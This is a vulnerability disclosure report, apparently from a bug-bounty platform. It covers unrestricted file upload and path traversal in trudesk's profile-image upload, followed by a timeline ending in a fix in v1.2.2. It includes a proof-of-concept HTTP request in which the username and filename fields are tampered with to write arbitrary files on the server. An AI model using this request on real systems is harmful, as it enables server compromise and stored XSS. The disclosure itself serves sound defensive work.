Unrestricted File Upload and Path Traversal in upload image in polonel/trudesk


Reported on

May 12th 2022


The uploadImage function in accountsController take file path and extension from users . An attacker can change the path and extension to upload dangerous file to anywhere in server.

Proof of Concept

1. Login 
2. Upload profile image
3. Capture request, modify `username` and `filename`
POST /accounts/uploadImage HTTP/1.1
Content-Length: 452
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQXoDBooqQ26crHR0
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: connect.sid=s%3A01nLIvLiz-oEhbSpekE9nwUSl9R_PQF1.GeCCIcToZnO%2BDlTis77aXBlVGyVOaQDURoUrIcrXQ%2BM; $trudesk%3Atimezone=America/New_York
Connection: close

Content-Disposition: form-data; name="username"

Content-Disposition: form-data; name="_id"

Content-Disposition: form-data; name="image"; filename="filename.anything"
Content-Type: image/jpeg

<image content>

alt text alt text


Authenticated user can upload dangerous file to anywhere in server (example: upload a file with .html extension lead to stored xss)


This function take object.username into join.path() lead to path traversal, take path.extname(filename) lead to upload file with dangerous type

We are processing your report and will contact the polonel/trudesk team within 24 hours. a year ago
tienpa99 modified the report
a year ago
tienpa99 modified the report
a year ago
We have contacted a member of the polonel/trudesk team and are waiting to hear back a year ago
polonel/trudesk maintainer has acknowledged this report a year ago
a year ago


Hi, I see you have read the report. Is it hard to understand or the poc doesn't working?

Chris assigned a CVE to this report a year ago
Chris validated this vulnerability a year ago
tienpa99 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
a year ago


This has been fixed in v1.2.2. I will update this report once it has been released.

a year ago


Sure. Just update here, I will recheck this issue.

We have sent a fix follow up to the polonel/trudesk team. We will try again in 7 days. a year ago
Chris marked this as fixed in 1.2.2 with commit d107f1 a year ago
Chris has been awarded the fix bounty
This vulnerability will not receive a CVE
accounts.js#L485-L505 has been validated
to join this conversation